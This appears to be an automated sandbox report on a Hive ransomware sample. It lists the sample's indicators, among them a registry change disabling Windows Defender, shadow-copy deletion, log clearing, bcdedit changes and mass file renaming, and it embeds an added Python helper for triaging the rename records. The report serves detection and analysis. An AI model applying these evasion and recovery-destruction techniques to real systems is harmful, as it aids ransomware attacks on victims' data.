Malware Analysis Report

2024-10-16 03:13

Sample ID 220323-sax1fsfhg6
Target 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.zip
SHA256 9a049fb095bba852a831ae0a4808833f835c2cebc1c81049bdc3ce694d380194
Tags hive evasion ransomware spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 9a049fb095bba852a831ae0a4808833f835c2cebc1c81049bdc3ce694d380194

Threat Level: Known bad

The file 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.zip was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Modifies security service

Hive

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs ping.exe

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-23 14:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-23 14:55

Reported

2022-03-23 14:58

Platform

win7-20220311-en

Max time kernel

4294151s

Max time network

58s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Pictures\InvokeGrant.raw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
File renamed | C:\Users\Admin\Pictures\InitializeMount.crw => C:\Users\Admin\Pictures\InitializeMount.crw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\InitializeMount.crw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
File renamed | C:\Users\Admin\Pictures\ExitRestore.png => C:\Users\Admin\Pictures\ExitRestore.png.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\ExitRestore.png.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
File renamed | C:\Users\Admin\Pictures\InvokeGrant.raw => C:\Users\Admin\Pictures\InvokeGrant.raw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe | N/A
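The rename rows above show the sample's naming scheme: the original path is kept intact and a long base64url-alphabet token plus the extension .a1tft are appended, so the pre-encryption filename can be recovered from the encrypted one. The following is an added triage helper, not part of the sandbox report: it parses the indicator text of the rename rows, checks that each rename is a pure "append marker" operation, tallies the tokens and extensions seen, and computes the common prefix of the tokens (the two token variants in this report share everything up to the last underscore). The token is treated as opaque; the 40-character minimum and the extension set are tuned to this sample and are assumptions, as is the constructed input list, which copies the three rename indicators above verbatim.

```python
import os
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Extension the sample appended to every file it renamed, per the indicators above (assumption:
# other samples of the family use other extensions, so pass your own set when hunting).
KNOWN_EXTENSIONS = {"a1tft"}

# <original path>.<token>.<ext>; the token is a long base64url-alphabet string treated as opaque.
# The 40-char minimum is tuned to this sample's 56-char tokens and keeps short real extensions
# (e.g. "charts.jar") from being mistaken for a marker.
_ENCRYPTED = re.compile(r"^(?P<original>.+)\.(?P<token>[A-Za-z0-9_-]{40,})\.(?P<ext>[a-z0-9]+)$")

# Indicator-column text of a rename row: "File renamed <src> => <dst>".
_RENAME = re.compile(r"^File renamed (?P<src>.+) => (?P<dst>.+)$")


@dataclass(frozen=True)
class EncryptedName:
    original: str   # path before the marker was appended
    token: str      # opaque appended token
    ext: str        # appended extension


def parse_encrypted_name(path: str, extensions: Iterable[str] = KNOWN_EXTENSIONS) -> Optional[EncryptedName]:
    """Split an encrypted filename into its parts, or return None for a normal path."""
    m = _ENCRYPTED.match(path)
    if not m or m["ext"] not in set(extensions):
        return None
    return EncryptedName(m["original"], m["token"], m["ext"])


def parse_rename_indicator(indicator: str) -> Optional[Tuple[str, str]]:
    """Return (src, dst) for a 'File renamed' indicator, or None for other indicator kinds."""
    m = _RENAME.match(indicator)
    return (m["src"], m["dst"]) if m else None


def common_token_prefix(tokens: Iterable[str]) -> str:
    """Longest shared prefix of the appended tokens (useful as a per-victim marker)."""
    return os.path.commonprefix(list(tokens))


def triage_renames(indicators: Iterable[str]) -> Dict[str, object]:
    """Recover victim filenames and tally marker tokens/extensions from rename indicators.
    A rename whose destination is not src + marker is reported under 'unparsed' so a
    different naming scheme is noticed instead of silently skipped."""
    victims: List[str] = []
    unparsed: List[str] = []
    tokens: Counter = Counter()
    exts: Counter = Counter()
    for ind in indicators:
        pair = parse_rename_indicator(ind)
        if pair is None:
            continue
        src, dst = pair
        enc = parse_encrypted_name(dst)
        if enc is None or enc.original != src:
            unparsed.append(ind)
            continue
        victims.append(src)
        tokens[enc.token] += 1
        exts[enc.ext] += 1
    return {"victims": victims, "unparsed": unparsed, "tokens": tokens,
            "extensions": exts, "token_prefix": common_token_prefix(tokens)}


# Constructed input: the indicator column of the three "File renamed" rows above, verbatim.
SAMPLE_RENAME_INDICATORS = [
    r"File renamed C:\Users\Admin\Pictures\InitializeMount.crw => C:\Users\Admin\Pictures\InitializeMount.crw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft",
    r"File renamed C:\Users\Admin\Pictures\ExitRestore.png => C:\Users\Admin\Pictures\ExitRestore.png.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft",
    r"File renamed C:\Users\Admin\Pictures\InvokeGrant.raw => C:\Users\Admin\Pictures\InvokeGrant.raw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft",
]

if __name__ == "__main__":
    result = triage_renames(SAMPLE_RENAME_INDICATORS)
    for victim in result["victims"]:
        print("encrypted:", victim)
    print("extensions:", dict(result["extensions"]))
    print("token prefix:", result["token_prefix"])
```

Feeding the "File opened for modification" rows through parse_encrypted_name works the same way and separates files that already carry the marker from files the sample only touched (the Sidebar gadget and .mui paths above have no marker).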

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\settings.html C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18192_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\PREVIEW.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_COL.HXC.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL077.XML.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\css\calendar.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\macroprogress.gif.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\en-US\Chess.exe.mui.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GIFT98.POC.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A

Launches sc.exe

Interacts with shadow copies

